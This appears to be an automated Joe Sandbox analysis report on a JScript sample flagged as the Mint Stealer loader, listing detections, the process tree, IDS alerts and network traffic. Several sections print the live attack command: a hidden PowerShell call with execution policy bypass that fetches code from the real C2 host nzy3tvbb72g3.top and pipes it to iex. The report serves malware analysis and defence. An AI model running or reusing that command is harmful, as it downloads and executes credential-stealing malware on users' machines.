Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FM5vWQHpqe.js

Overview

General Information

Sample name:FM5vWQHpqe.js
renamed because original name is a hash value
Original sample name:24c03cb37e48b5810f40fdd69acb290d67dbfd003bef5c21cf23b1d210a0faa1.js
Analysis ID:1595057
MD5:c1c0e16fc76c9da7873958c89c59416d
SHA1:c66661696fa8bdc6576c4b47a106a0c32518b2b9
SHA256:24c03cb37e48b5810f40fdd69acb290d67dbfd003bef5c21cf23b1d210a0faa1
Tags:jsnzy3tvbb72g3-topSpam-ITAuser-JAMESWT_MHT
Infos:

Detection

Mint Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Mint Stealer
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Deletes itself after installation
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
JavaScript source code contains functionality to generate code involving a shell, file or stream
Queries Google from non browser process on port 80
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7456 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FM5vWQHpqe.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7580 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

Threatname: MintStealer

{"C2 url": "http://nzy3tvbb72g3.top/1.php?s=mints13"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.1499672307.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MintStealer_1Yara detected Mint StealerJoe Security
    00000000.00000003.1500335199.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MintStealer_1Yara detected Mint StealerJoe Security
      00000000.00000003.1500163574.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MintStealer_1Yara detected Mint StealerJoe Security
        00000000.00000003.1499012379.0000023BD7E29000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MintStealer_1Yara detected Mint StealerJoe Security
          00000000.00000003.1497822366.0000023BD9C3B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MintStealer_1Yara detected Mint StealerJoe Security
            Click to see the 3 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_7456.amsi.csvJoeSecurity_MintStealer_1Yara detected Mint StealerJoe Security

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FM5vWQHpqe.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FM5vWQHpqe.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FM5vWQHpqe.js", ProcessId: 7456, ProcessName: wscript.exe
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex", CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FM5vWQHpqe.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7456, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex", ProcessId: 7580, ProcessName: powershell.exe
              Sigma detected: Usage Of Web Request Commands And Cmdlets
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex", CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FM5vWQHpqe.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7456, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex", ProcessId: 7580, ProcessName: powershell.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FM5vWQHpqe.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FM5vWQHpqe.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FM5vWQHpqe.js", ProcessId: 7456, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex", CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FM5vWQHpqe.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7456, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex", ProcessId: 7580, ProcessName: powershell.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-20T11:55:51.369979+010020570631A Network Trojan was detected192.168.2.849705206.188.196.21980TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-20T11:55:51.369979+010020577431A Network Trojan was detected192.168.2.849705206.188.196.21980TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-20T11:55:51.369979+010018100002Potentially Bad Traffic192.168.2.849705206.188.196.21980TCP
              2025-01-20T11:55:52.016079+010018100002Potentially Bad Traffic192.168.2.849706142.250.185.6880TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://nzy3tvbb72g3.top/1.php?s=mints13Avira URL Cloud: Label: malware
              Source: http://nzy3tvbb72g3.topAvira URL Cloud: Label: malware
              Found malware configuration
              Source: amsi64_7456.amsi.csvMalware Configuration Extractor: MintStealer {"C2 url": "http://nzy3tvbb72g3.top/1.php?s=mints13"}
              Multi AV Scanner detection for submitted file
              Source: FM5vWQHpqe.jsVirustotal: Detection: 19%Perma Link
              Source: Binary string: n.pdb? source: powershell.exe, 00000002.00000002.1570309617.0000027957BF7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdbstem32\Drivers\DriverDataNUMBER_OF_PROCESSORS=2OS=Windows_NTPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64ProgramData=C:\ProgramDataPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoota source: powershell.exe, 00000002.00000002.1549666918.000002793D922000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: softy.pdb source: powershell.exe, 00000002.00000002.1569227038.00000279578DF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbourcG source: powershell.exe, 00000002.00000002.1569227038.000002795795E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1570309617.0000027957BB7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000002.00000002.1570309617.0000027957BB7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: softy.pdbat source: powershell.exe, 00000002.00000002.1569227038.00000279578DF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: icrosoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000002.00000002.1569227038.00000279578A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000002.00000002.1549666918.000002793D922000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: soft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 00000002.00000002.1569227038.00000279578DF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbu source: powershell.exe, 00000002.00000002.1569227038.000002795795E000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior

              Software Vulnerabilities

              barindex
              JavaScript source code contains functionality to generate code involving a shell, file or stream
              Source: FM5vWQHpqe.jsReturn value : ['"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl URL |iex""', '"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top']Go to definition
              Source: FM5vWQHpqe.jsArgument value : ['"Scripting.FileSystemObject"', '"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl URL |iex""', '"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top']Go to definition
              Source: FM5vWQHpqe.jsReturn value : ['"Scripting.FileSystemObject"', '"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl URL |iex""', '"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top']Go to definition
              Source: FM5vWQHpqe.jsReturn value : ['"Wscript.Shell"', '"Scripting.FileSystemObject"', '"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl URL |iex""', '"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top']Go to definition
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2057063 - Severity 1 - ET MALWARE Mints.Loader CnC Activity (GET) : 192.168.2.8:49705 -> 206.188.196.219:80
              Source: Network trafficSuricata IDS: 2057743 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.2.8:49705 -> 206.188.196.219:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http://nzy3tvbb72g3.top/1.php?s=mints13
              JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
              Source: FM5vWQHpqe.jsReturn value : ['"http://nzy3tvbb72g3.top/1.php?s=mints13"', '"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top']Go to definition
              Source: FM5vWQHpqe.jsReturn value : ['"http://nzy3tvbb72g3.top/1.php?s=mints13"']Go to definition
              Queries Google from non browser process on port 80
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 206.188.196.219 206.188.196.219
              Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.8:49706 -> 142.250.185.68:80
              Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.8:49705 -> 206.188.196.219:80
              Source: global trafficHTTP traffic detected: GET /1.php?s=mints13 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: nzy3tvbb72g3.topConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /1.php?s=mints13 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: nzy3tvbb72g3.topConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
              Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: nzy3tvbb72g3.top
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
              Source: powershell.exe, 00000002.00000002.1550248650.0000027941258000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1565751136.000002794F912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000002.00000002.1550248650.000002793FAC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940E71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940BD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nzy3tvbb72g3.top
              Source: powershell.exe, 00000002.00000002.1550248650.000002793F8A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nzy3tvbb72g3.top/1.php?s=mints13
              Source: powershell.exe, 00000002.00000002.1550248650.00000279410E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.1550248650.0000027940E8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940B47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.000002794079C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940B28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1565751136.000002794F912000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.00000279407B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.00000279407AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940B54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940B5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
              Source: powershell.exe, 00000002.00000002.1550248650.000002793FC5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPageX
              Source: powershell.exe, 00000002.00000002.1550248650.000002793F8A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 00000002.00000002.1550248650.00000279410E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
              Source: powershell.exe, 00000002.00000002.1550248650.0000027940E71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.000002793FC2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940E8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
              Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940E8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
              Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
              Source: powershell.exe, 00000002.00000002.1550248650.0000027940E8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=en
              Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=enX
              Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940E8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
              Source: powershell.exe, 00000002.00000002.1550248650.000002793F8A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000002.00000002.1550248650.000002793FC42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1565751136.000002794FB9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1565751136.000002794F8B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.000002793FC5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.000002793FDB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940E8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1565751136.000002794F912000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
              Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
              Source: powershell.exe, 00000002.00000002.1565751136.000002794F912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000002.00000002.1565751136.000002794F912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000002.00000002.1565751136.000002794F912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000002.00000002.1550248650.0000027940E71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.000002793FC5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.000002793FC2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1565751136.000002794F912000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
              Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
              Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
              Source: powershell.exe, 00000002.00000002.1550248650.00000279410E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
              Source: powershell.exe, 00000002.00000002.1550248650.000002793FDB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
              Source: powershell.exe, 00000002.00000002.1550248650.000002793FC42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1565751136.000002794FB9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1565751136.000002794F8B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.000002793FC5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940E8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1565751136.000002794F912000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
              Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
              Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
              Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
              Source: powershell.exe, 00000002.00000002.1550248650.0000027941258000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1565751136.000002794F912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
              Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
              Source: powershell.exe, 00000002.00000002.1550248650.000002793FCCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
              Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
              Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
              Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
              Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
              Source: powershell.exe, 00000002.00000002.1550248650.0000027940B5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2025/dr-martin-luther-king-jr-day-2025-6753651837110587.2-2x.pn
              Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
              Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
              Source: powershell.exe, 00000002.00000002.1550248650.000002793FDB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940E8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1565751136.000002794F912000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: powershell.exe, 00000002.00000002.1550248650.000002793FDB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.comX
              Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1

              System Summary

              barindex
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
